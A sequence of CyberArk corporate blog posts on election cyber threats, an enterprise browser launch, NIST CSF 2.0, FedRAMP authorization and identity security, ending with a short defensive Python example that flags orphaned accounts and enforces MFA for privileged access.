According to the Election Cyber Interference Threat Research Report 2024, the U.S., U.K., South Korea and India are the riskiest countries concerning election cyber interference from geopolitical adversaries like China and Russia. We have seen a rise in state-sponsored cyberthreats recently, with the most recent infiltration by APT29 into the Microsoft and HPE networks to spy on executives’ emails. While initial reports from Microsoft and HPE indicated limited damage, after further investigation, Microsoft reported that APT29 gained access to the company’s source code repositories and internal systems. There’s no doubt that this is a warning sign that bad actors are quietly and strategically placed in the backyards of the technology vendors who provide critical infrastructure to many governments worldwide. Similarly, in February 2024, Volt Typhoon, a Chinese group, breached vital network systems at a supplier widely used by U.S. government agencies. These are known instances of cyberthreats from foreign adversaries in the first two months of 2024 alone. Throughout the year, it’s expected that these foreign adversaries – intent on wreaking havoc – will relentlessly try to penetrate inside the walls of every sovereign democracy. While we know what we know, I’m certain we’re unaware of plenty of bad actor activity.

The Age of AI, Misinformation and Disinformation – The Run-up to Election Day

As any country approaches election day, a new battleground emerges, one where artificial intelligence (AI), misinformation and disinformation collide. The rise of phishing and vishing attacks threatens to exploit voter identities, potentially leading to election fraud. Covert influence campaigns, meticulously orchestrated, can sway voter mindsets and election outcomes. The recently published Annual Threat Assessment of the U.S. Intelligence Community, released by the Office of the Director of National Intelligence, confirmed potential international interference via social media during the 2022 U.S. midterm election cycle. And now, with the advent of AI, strategic targeting of individuals or groups of individuals via impersonation attacks will be on the rise and increasingly difficult to distinguish from legitimate communication. For example, in January, voters in New Hampshire received a robocall seemingly from U.S. President Joe Biden asking them not to vote in the state’s primary. Upon investigation, state officials determined it was an AI-enabled vishing attack intended to manipulate the elections.

In an attempt to pre-empt similar attacks, South Korea’s National Police Agency (KNPA) has implemented a tool to detect deepfakes. These sophisticated algorithms aim to identify manipulated videos and prevent their spread during the elections. The issue we must recognize here is not limited to the spread of misinformation but extends to the human tendency to readily believe the messages they see or read regularly.

In our increasingly digital world, many voters depend on social media as their primary source of news and information despite the general knowledge that it’s a breeding ground for rampant misinformation and disinformation. Safeguarding elections is a combined responsibility – of the people and by the people – in any democracy. As such, all stakeholders, including political parties, election officials, social media websites and voters, must work together and adopt best practices and measures to protect the electoral process.

Election Infrastructure is an Expanded Threat Vector

The shift from analog to digital and physical to virtual impacts not only the workforce in the digital era but also voters worldwide. In this sea of change, nations must secure and protect every aspect of their election machinery. These are the critical aspects that require special attention to ensure a successful democratic election exercise:

  • Voter registration databases store the personal information of millions of voters in each country and decide who can vote where. These databases hold highly sensitive personal information, such as names, government I.D. numbers, dates of birth and the addresses of millions of voters in each country. Voter fraud is a real threat if voter identity and credentials are stolen and misused to cast unauthorized votes. If exposed, this information can be used to swing election results by various methods where bad actors can persuade (via social engineering) voters to vote a particular way.
  • Electronic poll books (EPBs) are endpoint devices or kiosks designed to partially automate the voter check-in process, detect ineligible voters, assign correct ballots and keep tabs on voters who have been issued a ballot. EPBs can be targeted in many ways, including DDoS, malware attacks, data breaches and system vulnerabilities.
  • Electronic voting machines (EVMs) are terminals where voters can cast ballots in person or scan mail-in votes. The threat vectors for EVMs are similar to those for EPBs. Outdated EVMs are at high risk. For example, the EVMs used in India were designed in 1989. They run the risk of dated software with potential vulnerabilities that can cause irreparable harm to the election results if exploited by bad actors.
  • Tabulation is the process of counting the ballots cast at the polling places. Bad actors can hack into voter tabulation systems to disrupt an election and its results.
  • Websites that provide voters with information on election processes can be disabled by bad actors and cause inconvenience and confusion for voters.

Defend the Democratic Exercise with Defense-in-depth

In the high-stakes world of election security, trusting a single line of defense is not enough. That’s where the concepts of defense-in-depth and Zero Trust come in, offering a layered approach to protecting critical election machinery. The following multi-layered approach is crucial for protecting all access points to election systems, from voter registration databases to voting machines:

  • Defense-in-depth strategy uses multiple, independent security controls, such as firewalls, intrusion detection systems and network segmentation, to protect election systems from different angles. Even if one layer is compromised, the others can prevent or slow down the attackers, buying valuable time to respond and contain the threat. This is a non-negotiable consideration in fortifying every aspect of the election machinery.
  • Zero Trust is a principle that assumes no trust within the system and requires continuous verification of every user and device, regardless of their level of access. Users and systems should be verified continuously and given minimum access to perform their duties while always assuming breach. Our research indicates that most organizations believe identity and endpoint are the top two considerations for a successful Zero Trust implementation. This means IAM capabilities (i.e., phishing-resistant MFA, SSO and PAM) and endpoint protection are critical to ensuring fine-grained control over who accesses which data where and for how long.
  • Identity Threat Detection and Response (ITDR) is a relatively new capability that detects and responds to identity-based threats, such as credential theft, privilege misuse and misconfiguration across the complex IAM landscape spanning hybrid and multi-cloud environments. ITDR can help analyze, report and remediate unprotected access paths and adversarial behaviors.
  • Endpoint protection incorporates antivirus software, removing admin rights and patch and change management.
  • Data security is bolstered by encryption, access controls, backups, monitoring and data classification to ensure data confidentiality and integrity.

Don’t Forget Basic Cyber Hygiene

As we battle the rising cyber risks during this election year by enabling security practices and processes to help safeguard the democratic exercise, it is equally important to brush up on the basic cybersecurity hygiene practices that have been around for years. Remember, even though national elections around the world happen on a cadence of four to five years, these cybersecurity hygiene practices have to be done more frequently for them to become second nature for every individual, whether it is election year or not.

  • Poll worker training should include methods to recognize and report suspicious behavior, identify EVM errors or glitches and safeguard voter data.
  • Voter training and awareness must include best practices for identifying legitimate sources of news and information and incorporating practices to protect against potential AI-generated deepfakes, phishing and vishing attacks.
  • Audit and monitor the security posture and threat landscape frequently across all aspects of the election machinery, both in the run-up to the elections and afterward.
  • Equipment testing should include user-centric design, ballot secrecy, security (such as software updates and change management), language options, consistency in user experience and general accessibility.
  • Contingency planning must cover backup and disaster recovery strategies in the event of a cybersecurity incident to avoid disruptions and unexpected outages.

The Election Process is a Collective Responsibility

As a CIO, I recognize that securing our election processes is not an isolated task but a collective responsibility, and we cannot do this alone. It requires partnerships between government agencies, technology vendors, election officials and, most importantly – voters. The 2024 elections, encompassing over half the global population, face unprecedented threats from cyberattacks, misinformation and outdated technology. Defense-in-depth does not start with products; it begins with us. It’s time we all do our part as individual voters, election officials, politicians – and, yes, technology providers – the time to act is NOW.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

Enterprise Browsers Need to Secure Identities Without Compromise https://www.cyberark.com/blog/enterprise-browsers-need-to-secure-identities-without-compromise/ Wed, 27 Mar 2024 03:57:32 +0000 https://www.cyberark.com/?p=188267

Now is the time.

It’s been over 30 years since the introduction of the first web browser. Since then, the browser has evolved into an application that allows us to stream entertainment, work and interact through social media. It’s the most widely used application among consumers … and now the enterprise.

Unfortunately, there’s little separation between work and personal life when you use a browser designed for consumer use. In short, it means any organization’s security is at risk – and there’s no lack of data breach headlines to make this painfully obvious.

In my travels over the years with CyberArk and as an entrepreneur, I’ve had numerous conversations with CISOs, CIOs and security practitioners about security risks and what this means for the browser. There’s consensus in the realization that consumer browsers like Google’s Chrome, Microsoft’s Edge and Apple’s Safari aren’t enough for the workplace.

In recent years, attackers have exploited vulnerabilities in consumer browsers by stealing cookies to breach organizations. In fact, our CyberArk Labs team has conducted research on cookie theft that resulted in hijacked sessions, and they can demonstrate a session takeover in minutes. It’s a scary scenario, but we must ensure organizations are protected using an enterprise browser through cookieless sessions and a true passwordless solution.

So, here’s the problem: browsers designed for consumers lack critical controls for the enterprise workspace. They don’t consider the surge of workforce identities and the multitude of endpoints employees use to access company data. This shortcoming opens consumer-based browsers to vulnerabilities attackers can exploit to steal an organization’s critical data. It’s a significant gap for any organization, especially when workers use a regular browser to access corporate resources.

At CyberArk, we listened to our customers, and today, we’re excited to deliver an identity-focused enterprise browser that provides added protection to one of the most frequently used applications in any organization. An enterprise browser is the gateway to securing identities and your corporate data.

There are three key areas a secure identity-focused browser will address in any organization:

  1. Improved security
  2. Enhanced productivity
  3. Increased privacy

Improved Security Driven by SaaS

In the last decade, enterprises have rapidly shifted toward using SaaS-based applications for work, fueled by on-premises applications that have been transformed into SaaS models. This transformation of how we work, combined with the fast-paced growth in identities thanks to remote workforces, unmanaged Bring Your Own Device (BYOD) policies, new environments and attack methods, has contributed to the need to improve how we protect an enterprise from all access points.

The shift toward SaaS was also fueled heavily by the pandemic’s onslaught. Now, with remote workers more reluctant to return to an office setting, the hybrid work model or even a fully remote office has become the wave of the future.

Accessing our enterprise resources through the browser drives the need for an added layer of security that sits within the security infrastructure. At CyberArk, we take a defense-in-depth, layered security approach to securing web sessions, least privilege on endpoints, passwordless and privileged access, for example. A secure browser brings the layers together at the highest level to secure our identities and serve as the gateway to our corporate data.

Enhanced Workforce Productivity

There’s a balance between security and worker productivity. How we protect the enterprise using a secure browser cannot come at the cost of worker productivity. An enterprise browser must offer the same seamless, familiar experience as users’ favorite browser, providing them access to their enterprise resources without affecting the user experience. It must be frictionless.

Workers will find that using a secure enterprise browser will be a better experience. Users can log into their enterprise resources from the enterprise browser without requiring reauthentication for every federated application and those that are password protected, accelerating the user’s workflow to a single click. The enterprise browser secures users without impacting productivity. It’s a win-win scenario.

Improved Flexibility for Security Compliance and Privacy

Compliance concerns are becoming greater and greater as new cybersecurity regulations require tighter restrictions on privacy. CISOs are also held responsible by their boards for ensuring their organizations comply with existing and new security regulations. Compliance and privacy teams continually work toward ensuring organizations adhere to the regulations that prescribe how corporate data is used and stored and that users and customers receive the privacy required for their data.

Consumer-based browsers store everything – from passwords to credit card data – in, say, Google Cloud. They also share data with third-party apps, expanding the attack surface. The enterprise browser shifts control back into the hands of security teams, providing organizations the flexibility to determine which data can reside in the cloud and which should remain on corporate premises. It offers built-in security to support compliance and help ensure privacy requirements are met before users access applications and data resources. This capability alleviates concerns from compliance and privacy teams, who can be confident that critical enterprise data remains secure through flexible storage options.

Secure Identities With an Enterprise Browser

As the industry continues to fend off new attacks and an evolving attack surface, our customers cannot be exposed to vulnerability gaps from unprotected browsers. In the current reality, the browser is an island among the IT admin’s security infrastructure with less consideration for security. This approach must change for organizations to implement an enterprise browser fully integrated within the security stack to help ensure identities don’t become compromised. However, we must balance security with worker productivity and offer a frictionless user experience.

It’s critical for your future, so now is the time.

Learn more about CyberArk Secure Browser and take a step toward securing your organization and all its identities.

Gil Rapaport is CyberArk’s Chief Solutions Officer.

CIO POV: What Makes a Good Neighbor in a Bad Cyber Neighborhood https://www.cyberark.com/blog/cio-pov-what-makes-a-good-neighbor-in-a-bad-cyber-neighborhood/ Thu, 21 Mar 2024 12:53:37 +0000 https://www.cyberark.com/?p=188340

“It’s discouraging to try to be a good neighbor in a bad neighborhood.” –William Castle

This quote from the late American horror film director has recently been running through my head as I think of the new NIST CSF 2.0 framework, the new AI regulations and the myriad software product certificates. In a nasty neighborhood of bad actors, these frameworks, regulations and certifications act as good neighbors. They are poised to enable organizations of any size to protect themselves against a barrage of cyberattacks. But, I also see the complexity they bring to CIOs and CISOs of various organizations in ensuring the right balance of security initiatives and alignment to frameworks, regulations and certifications, especially in cases where technology advances faster than a framework or regulation.

The following recent events have made me think about the three areas in which we as a collective can influence the cyber world positively, which is otherwise packed with many negative forces.

1. A Decade in the Making – CSF 2.0 is Finally Here

In January 2024, nearly 10 years after its first release, the National Institute of Standards and Technology (NIST) released an updated 2.0 version of the Cyber Security Framework (CSF). As you may already know, CSF 2.0 is designed to be used by organizations of all sizes across all sectors as opposed to its predecessor, which focused only on critical infrastructure. CSF 2.0 also takes into consideration technologies that have emerged since the original iteration of the framework and elevates the importance of supply chain risk management and cybersecurity governance.

While the CSF 2.0 is a vast improvement over its 10-year-old predecessor, the problem with this framework remains the same – voluntary compliance with the framework has essentially failed to improve or implement effective cybersecurity. In July 2022, 10 of the 24 U.S. federal agencies received an F on cybersecurity practices, according to the Federal Information Technology Acquisition Reform Act (FITARA) scorecard. Fast forward to January 2024, and nearly half of the same 24 federal agencies had improved their scores to C or D in the same category.

This improvement comes on the heels of the Biden administration’s 2021 Executive Order on Improving the Nation’s Cybersecurity (EO 14028), which mandated all federal agencies to transition to a Zero Trust approach to cybersecurity with specific guidance on securing pillars such as identities and endpoints. The progress of every federal agency is tracked and aligned to NIST’s CSF 2.0. The point is that NIST’s CSF 2.0 is an excellent guide to reducing cyber risks, but on its own it will not do the trick and secure your organization. Much like the EO 14028, what will move the needle is executives and the board of any organization mandating a regular performance assessment against CSF 2.0 to ensure continuous risk assessment and an improved security posture that keeps your organization secure.

2. Regulation vs. Innovation – Problem or Peril?

The European Union has led the charge for regulatory frameworks and set an example for the world. Having set the standard and implemented regulations for data privacy, carbon emissions and mergers, the EU has done the same for AI. The EU AI Act was passed in February 2024. It will be implemented in 2026 and seeks to regulate the use of AI models based on their potential risks, applying stringent rules to riskier applications and separate regulations to general-purpose AI models such as ChatGPT. Following the EU, President Biden issued his AI executive order (EO 14110) in the United States, seeking to manage the risks stemming from AI and protect the government and American citizens.

The EU AI Act and the U.S. Executive Order on AI seek to preserve and protect the data privacy of millions of residents. To do this, there is a particular focus on identifying and mitigating the risk of fraud, misinformation and disinformation. So, while these new regulations continue to be introduced in the market, what good is data privacy without cybersecurity? This often leads me back to my drawing board. I ask myself, is my cybersecurity strategy still producing optimal results for my organization, or do I need to make changes?

3. Complexity of the Number of Certifications

Certifications formally recognize a product, system or service’s compliance with specific standard requirements. These certifications often serve as a benchmark for customers and prospects evaluating various companies and technology products to ensure that a product’s functionality, reliability, usability, efficiency and manageability are on par with the set requirements. However, the number and types of certifications can often put enormous pressure on organizations that seek to get their products certified or maintain certification. Software product certifications include, but are not limited to, NERC, the many types of ISO certifications, SOC 1 Type 1, SOC 2 Type 2, CMMC and FedRAMP. The list goes on.

However, if we closely examine the requirements of many of these certifications, we’ll find many overlaps. As an industry, I wish we would strive toward consolidating the common parts of every – or at least many – certificates and focus on differentiation when dealing with a specific certification. But I won’t hold my breath for this day to come.

My Advice on How to Effect Change in a Bad Neighborhood

If you are a CIO or CISO, I recommend that you take ownership as a good neighbor and actively support your industry peers and organizations like NIST and NCSC, which develop guidelines for securing a nation’s critical infrastructure and any organization of any size across any sector. I recommend you consider the following as the duties of a good neighbor to slowly and effectively increase the good in the bad neighborhood.

  • Engage in bi-directional partnerships. Technology vendors and NIST must ramp up their collaboration to regularly review and update existing frameworks with faster feedback loops to keep up with the changing technology landscape. In a world increasingly influenced by AI, the industry cannot afford to wait another 10 years for NIST to update its CSF again.
  • Harden your cybersecurity foundation. No matter which regulation or framework you are dealing with, a robust security posture will remain the bedrock for regulatory compliance and continuously protecting your sensitive assets against relentless bad actors.
  • Mandate metrics. If your organization leverages CSF 2.0 or its earlier version to reduce risks, ensure that you mandate regular evaluations of specific cybersecurity and risk assessments so you can improve and iterate as necessary. Voluntary evaluations can take a backseat amid a time crunch, but a mandate is often helpful in ensuring thorough evaluations are carried out regularly and periodically.
  • Remember that certifications do not necessarily correlate to a good security posture. My advice to any organization evaluating and procuring security products based on certifications is to remember that the success of your security programs depends on implementing your initiatives within your specific environment, not on using a standalone certified product.

Finally, I advise all CIOs and CISOs to do their part as good neighbors and help other good neighbors. For example, encourage proactive interaction and partnership with NIST or other governing bodies. This partnership will go a long way in a world where technology moves faster than the pace at which government can effect change. As a leader, share your experiences and knowledge base with the new generation of CIOs and CISOs. These good neighbor gestures will help build a strong community to protect against bad ones.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

CyberArk SaaS Solutions Achieve FedRAMP® High Authority https://www.cyberark.com/blog/cyberark-saas-solutions-achieve-fedramp-high-authority/ Tue, 19 Mar 2024 12:38:43 +0000 https://www.cyberark.com/?p=188038

I’m honored to share that CyberArk is FedRAMP® High Authorized and ready to support U.S. federal agencies in securing access to critical government data and systems, meeting Zero Trust mandates and advancing their missions.

Two of our leading identity security SaaS offerings, CyberArk Endpoint Privilege Manager and CyberArk Workforce Identity, have achieved Federal Risk and Authorization Management Program (FedRAMP) High Authority to Operate certification, and are now available on the FedRAMP Marketplace.

This designation reinforces CyberArk’s long-standing commitment to providing trusted, independently verified solutions that meet the U.S. government’s most stringent security requirements. And it comes on the heels of the FedRAMP Authorization Act, a law that streamlines the approval process for cloud services by enabling federal agencies to implement FedRAMP-authorized solutions without additional security and risk assessments. As a standardized approach, FedRAMP reduces duplicative efforts and cost inefficiencies while promoting innovation across the federal government.

The explosion of new identities, new environments and new attack methods has rapidly expanded the attack surface, creating an acute need for both public and private organizations to secure all identities, human and machine. By delivering FedRAMP High-Authorized identity security solutions, CyberArk is uniquely positioned to help federal agencies accelerate secure cloud adoption while protecting critical assets from damaging ransomware, supply chain attacks and emerging AI-fueled threats.

Digital Visionary Theresa Payton Weighs in on the State of Federal Cloud Adoption

I had the opportunity to speak with Theresa Payton, former White House CIO, bestselling author and founder and CEO of Fortalice Solutions, about today’s government-wide migration to the cloud. In our conversation below, we explore key opportunities and challenges, and the push to remove adoption barriers.

The federal government’s shift to the cloud has taken place slowly but surely over the past decade. Then came an unanticipated disruptor: COVID-19. Suddenly, cloud services became even more critical to advancing agency missions. Can you describe an example in action?

“When the pandemic hit, agencies were forced to work on the fly to adjust how they do business. Hitting fast forward on cloud initiatives certainly had its benefits. One example comes from the federal civilian area: The U.S. Postal Service, backed by AWS, rapidly scaled up their COVID test kit website and quickly responded to over 100 million households requesting kits.”

According to MeriTalk research, only 30% of federal, state and local government IT leaders say their cloud strategy has kept pace with this accelerated adoption; 56% say managing and securing data is their biggest challenge. Every new cloud-based initiative generates a massive number of identities, further exacerbating these concerns. How can government security leaders turn things around?

“Agencies must come to terms with several cloud-based risks that lurk beneath the surface in this new technology landscape. To see just how many threats a cloud-based organization with under-developed security protocols will face, look no further than cloud identity and access management. Beyond the schemes of cybercriminals, non-malicious human error on its own has the potential to hinder mission-critical functions in the form of misconfigured networks and mismanaged controls. Now, as agencies and private sector organizations no longer have to “build the plane while they fly it,” they should take the time to resolve any built-up technical debt and ensure proper configuration is factored into any new cloud components.”

More sensitive government information flows across cloud infrastructure and applications than ever before, yet federal cloud adoption lags the commercial sector. Procurement hurdles are contributing factors. Will measures outlined in the FedRAMP Authorization Act help agencies fast-track efforts?

“Federal agencies and commercial organizations face numerous regulatory and compliance hurdles to efficiently conduct business and move the mission forward. Regulations such as FedRAMP and CMMC, though critical to discerning organization, service and product suitability, can lead to a lack of agility and efficiency when combined with each other and with other compliance requirements. Much like how multiple government agencies have required their own suitability processes on top of clearances, overlapping but differing compliance processes can lead to backlogs and delays in achieving mission success. But don’t mistake the differing regulatory requirements for being redundant or unnecessary. Look no further than the major 2020 cyber incident that was SolarWinds to understand the dire implications of any missteps in supply chain risk management.

Ultimately, threading the needle of decreasing the compliance burden while maintaining the necessary level of regulatory scrutiny may be a tightrope walk, but laws such as the FedRAMP Authorization Act are a step in the right direction.”

How can programs like FedRAMP help the Department of Defense and other federal agencies achieve their Zero Trust goals and advance national cybersecurity priorities?

“FedRAMP had already begun preparing for the Zero Trust cybersecurity posture before the DoD released its Zero Trust Strategy, but as new tools, technologies and threats arise, continued attention will need to be paid by government and government-adjacent regulatory programs.

The ‘never trust, always verify’ mentality puts the security responsibility on everyone involved, which includes products and services provided to the government. By adopting Zero Trust-focused compliance requirements, FedRAMP can place a greater onus on private sector organizations to launch the federal government efficiently and expediently into a more secure and more efficient future.”

CyberArk is FedRAMP Ready to Serve

Identity-based attacks aren’t just the future. They’re the present. The front line. The new battlefield.

Federal agencies require advanced identity security capabilities to meet their dynamic and evolving cybersecurity needs. As the pioneers of privileged access management, CyberArk offers the most complete and extensible Identity Security Platform in the world, empowering government agencies with a security-first approach grounded in Zero Trust. By applying intelligent privilege controls to all identities – human and machine – CyberArk enables secure access to any resource, anywhere, everywhere – with a single, unified platform. Today, more than 8,000 organizations worldwide trust CyberArk to protect their critical assets and surround every identity with a powerful force field of continuous protection.

CyberArk stands FedRAMP Ready to support your federal agency, protecting sensitive government data and infrastructure and helping you move forward, fearlessly, to achieve mission success and unlock the endless potential of progress, growth, innovation and hope.

Troy Grubbs is U.S. federal sales director at CyberArk.

How to Align Your Security Strategy with NIST Cybersecurity Framework 2.0 https://www.cyberark.com/blog/how-to-align-your-security-strategy-with-nist-cybersecurity-framework-2-0/ Thu, 14 Mar 2024 14:42:53 +0000 https://www.cyberark.com/?p=188051

After a decade in the making – or waiting, as the case may be – the National Institute of Standards and Technology (NIST) has released the first major revision to its Cybersecurity Framework (CSF), a set of voluntary standards and best practices for managing cybersecurity risks. NIST CSF 2.0, released on Feb 26, 2024, expands the scope and applicability of the framework to cover more types of organizations and industries, including the private sector, government and nonprofits. The new framework comprises six core functions: Govern, Identify, Protect, Detect, Respond and Recover. (I will detail these functions later on in this blog post.)

In this era of heightened digital vulnerability, the need for robust security measures has never been more pressing. NIST CSF 2.0 provides organizations with detailed guidance on managing their cybersecurity risks based on six main functions. The new framework includes a list of desired outcomes for organizations when building their cybersecurity strategy. It does not, however, detail how to achieve those outcomes in an identity security program – this is where you’ll want to take the advice of a trusted partner that can provide you with a best practices framework to follow.

This blog post will overview how identity security best practices related to people, processes and technology can help organizations adhere to NIST CSF 2.0 guidelines. The published guidelines are constructed on six interconnected functions, as shown in the figure below.

Figure: NIST CSF 2.0 functions (Source: https://www.nist.gov/)

Function 1: Govern – Understanding the Organizational Strategy and Policy

Focused on organizational strategy, the Govern function guides actions to achieve and prioritize outcomes in alignment with the organization’s mission and stakeholder expectations. NIST highlights understanding organizational context, establishing cybersecurity strategy and supply chain risk management, defining roles and responsibilities and enforcing policies.

Best practice identity security frameworks can help you achieve these goals. Organizations need clear and documented KPIs for their identity security programs. Such frameworks could offer risk-based prioritization guidance to help accelerate risk management decisions and determine key KPIs.

A comprehensive privileged access management (PAM) program should also include solutions for securing third-party access to reduce supply chain-related risks as much as possible. According to NIST, vulnerabilities resulting from external identities can directly impact an organization’s security. By identifying and mitigating those risks, organizations can enhance their overall cybersecurity posture and better protect themselves against threats.

Function 2: Identify – Mapping and Understanding Organizational Assets and Risks

The Identify function covers identifying and prioritizing the organization’s current cybersecurity risks in alignment with the strategy and mission needs. This function involves identifying opportunities for improvement in policies and processes related to risk management and informing actions across all organizational functions.

A best practices framework can also help you recognize high-risk resources and identify common identities such as IT admins, developers, workforce and machine identities. Advanced solutions for account discovery, intelligence and auditing can help with ongoing control and visibility of your environment.

Function 3: Protect – Securing Risky Assets

The Protect function involves utilizing capabilities to safeguard sensitive assets and reduce or eliminate the risk of incidents. Outcomes covered by this function include identity management, authentication and access control, awareness and training, data security, platform security and the resilience of technology infrastructure.

Thorough identity security programs can help address all these subcategories. A unified set of solutions that enables secure access to organizational assets with intelligent privilege controls, regardless of the environment (i.e., cloud services, elastic workloads, long-lived systems and high-risk apps) is recommended. Solutions include:

Function 4: Detect – Finding and Analyzing Attacks

The Detect function calls for continuous monitoring of assets and detecting anomalies from internal users and external vendors, as well as incident response and recovery solutions. Taking a proactive stance on risk management can significantly enhance your ability to uphold this function.

Centralized audit and identity threat detection and response (ITDR) capabilities should be applied consistently across all sessions. This entails centralized monitoring of employee and external vendor access to corporate resources.

Function 5: Respond – Acting Upon and Containing Attacks

In the NIST CSF 2.0, the Respond function outlines the necessary actions to take upon detection of risky activities, including containment and eradication of incidents. It covers incident management, analysis, mitigation, reporting and communication. The first step in this process is deploying your incident response (IR) plan and conducting an ongoing investigation to ensure an effective response.

Once again, intelligent privilege controls and expert remediation services can help you detect and identify threats faster, with broader coverage, quick response and minimal damage.

Function 6: Recover – Restoring Affected Assets

This function involves restoring assets and operations affected by the incident and executing the recovery portion of the IR plan. This function covers reporting, documenting and communicating the outcomes and consequences of the incident, both internally and externally.

Strong identity protections facilitate easier auditing of malicious access and can help reduce the damage and allow faster and easier recovery. For instance, access can be deemed invalid if not provisioned through a PAM solution. Additionally, through lessons learned, the recovery process identifies relevant attack methods, targeted identities and resources, which triggers new risk assessments and reassessments of the security roadmap and plan.

The six functions of NIST CSF 2.0 are circular and interconnected. Therefore, the greater the investment organizations make in preparing and implementing the necessary protections, the smoother their ability to respond to threats and recover from cybersecurity incidents.

Unified under CyberArk’s identity security platform, our solutions align closely with NIST’s approach, offering comprehensive support and services for securing all identities – human and machine – across hybrid and multi-cloud environments.

Lilach Faerman Koren is a senior product marketing manager at CyberArk.

Why Identity Security Is Essential to Cybersecurity Strategy https://www.cyberark.com/blog/why-identity-security-is-essential-to-cybersecurity-strategy/ Fri, 08 Mar 2024 17:14:29 +0000 https://www.cyberark.com/?p=187951

In the modern digital landscape, cybersecurity isn’t just a technical challenge – it’s a business imperative. At the heart of cybersecurity is identity security – the principle that the right people have the right access at the right time. As we venture further into the digital world, protecting the business from modern threats is crucial; that protection inherently adds complexity, which makes smart privilege controls a must-have step toward an identity-first strategy.

The cost of bypassing identity security can be high – data breaches, loss of customer trust and financial penalties are only some of the consequences leadership must contend with in digital service management. For example, a simple case of an employee having excessive access rights can lead to data theft or sabotage.

Identity security is not just about authentication and authorization but also visibility, governance and compliance. For instance, the insurance industry increasingly recognizes identity security as a foundational element of effective cyber insurance, highlighting the need for robust identity and access management (IAM) practices to mitigate cyber risks. These criteria demonstrate the insurance industry’s commitment to elevating identity security as the foundation of cyber resilience, ensuring that organizations are well-equipped to protect against and respond to cyber threats.

Identity security is the source of trust and security for all other security controls and policies. In this blog post, I’ll explain why security-first identity is essential to your cybersecurity strategy, and how organizations can leverage identity as a key enabler of security in the digital age.

Why Identity is the Future of Security

Identity is the core of cybersecurity, as it defines what counts as a legitimate action – and what’s considered malicious behavior. Identity is the primary way organizations can determine and manage who has access to which resources – and under what conditions – and ensure that those access privileges are used appropriately. Identity is how organizations can monitor and audit their users, devices, applications, activities and behaviors and detect and respond to anomalies or incidents.

With identity security, you can know who’s accessing data and systems, why they’re accessing it and what they’re doing with it. Without identity security, you cannot enforce security policies and compliance requirements, and your organization cannot hold users and partners accountable for their actions. Identity security is especially critical in today’s context of digital transformation, cloud migration, remote work and mobile devices. These trends have increased the complexity and diversity of identities, the attack surface and the potential for identity compromise.

Your security strategy must accommodate many identities, such as employees, customers, partners, contractors, vendors, devices, applications and services, each with distinct levels of trust and access requirements. You must also deal with various identity-related challenges, such as identity sprawl, orphaned accounts, privileged access abuse, credential theft, password reuse, shadow IT and identity fraud. To address these challenges, you can take a security-first identity approach, which means that identity security is not an afterthought or a definitive solution but rather a set of principles that guide the construction of your cybersecurity strategy. A security-first identity approach means implementing security controls and policies based on the identity context and risk profile of your users, devices and applications.

How to Cultivate Identity as a Key Security Enabler

To establish identity as a key security enabler, you must adopt an identity security framework that covers the following:

  • Identity lifecycle management – involves creating, provisioning, updating and de-provisioning identities and access privileges for all users, devices and applications based on their roles and responsibilities within the organization. It also ensures that identities and access privileges are accurate, up-to-date and compliant with the organization’s policies and regulations.
  • Identity and access management – involves verifying and validating the identities and access privileges of all users, devices and applications based on their context, behavior and risk level. Identity and access management also involves enforcing granular and dynamic access policies and rules, such as least privilege, multi-factor authentication (MFA) and conditional access.
  • Identity protection and intelligence – involves detecting and preventing threats and attacks that target the identities and access privileges of all users, devices and applications. Identity protection and intelligence also include analyzing and correlating the data and insights from the identity security framework and applying advanced analytics, machine learning (ML) and artificial intelligence (AI) to identify and respond to anomalies, incidents and risks.
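As an added illustration of the lifecycle-management and access-policy items above (example code written for this page, not CyberArk’s or any product’s own), the following Python script reconciles a constructed HR roster against a constructed account directory to flag orphaned accounts, reports privileged entitlements that have gone unused past a stale threshold, and applies a least-privilege access decision that steps up to MFA for privileged entitlements. The roster, accounts, entitlement names, the `admin:` prefix convention and the 90-day stale threshold are all assumptions chosen for the example.

```python
"""Added example: a minimal identity-lifecycle reconciliation and access-policy check.
Not CyberArk code. All data below is constructed sample input; helper names are hypothetical."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional


@dataclass
class Account:
    username: str
    owner_employee_id: Optional[str]   # None for service accounts with no human owner
    entitlements: set
    last_login: date


# Constructed sample data: the HR system of record and the account directory.
HR_ROSTER = {"E100": "active", "E200": "active", "E300": "terminated"}

ACCOUNTS = [
    Account("alice", "E100", {"read:reports"}, date(2024, 3, 1)),
    Account("bob", "E200", {"read:reports", "admin:prod-db"}, date(2023, 9, 1)),
    Account("carol", "E300", {"admin:prod-db"}, date(2024, 2, 20)),          # owner terminated
    Account("svc-backup", None, {"read:backups"}, date(2024, 3, 2)),         # no owner recorded
]

PRIVILEGED_PREFIXES = ("admin:",)        # assumption: naming convention for privileged entitlements
STALE_AFTER = timedelta(days=90)         # assumption: unused privilege older than this is a finding
TODAY = date(2024, 3, 8)                 # fixed "now" so the example is reproducible


def find_orphaned_accounts(accounts, roster):
    """Split accounts into those whose owner is no longer active in HR (orphaned,
    candidates for de-provisioning) and those with no owner at all (need an owner assigned)."""
    orphaned, unowned = [], []
    for acct in accounts:
        if acct.owner_employee_id is None:
            unowned.append(acct.username)
        elif roster.get(acct.owner_employee_id) != "active":
            orphaned.append(acct.username)
    return orphaned, unowned


def find_stale_privileged(accounts, today=TODAY):
    """Privileged entitlements held by accounts that have not logged in within STALE_AFTER."""
    findings = []
    for acct in accounts:
        priv = {e for e in acct.entitlements if e.startswith(PRIVILEGED_PREFIXES)}
        if priv and today - acct.last_login > STALE_AFTER:
            findings.append((acct.username, sorted(priv)))
    return findings


def access_decision(acct, entitlement, mfa_verified, roster=HR_ROSTER):
    """Least-privilege decision: deny unless the entitlement is assigned and the owner is
    active; privileged entitlements additionally require a verified MFA step-up."""
    if entitlement not in acct.entitlements:
        return "deny: entitlement not assigned"
    if acct.owner_employee_id is not None and roster.get(acct.owner_employee_id) != "active":
        return "deny: owner not active"
    if entitlement.startswith(PRIVILEGED_PREFIXES) and not mfa_verified:
        return "step-up: MFA required"
    return "allow"


if __name__ == "__main__":
    print("orphaned / unowned:", find_orphaned_accounts(ACCOUNTS, HR_ROSTER))
    print("stale privileged:", find_stale_privileged(ACCOUNTS))
    print("bob -> admin:prod-db without MFA:", access_decision(ACCOUNTS[1], "admin:prod-db", False))
```

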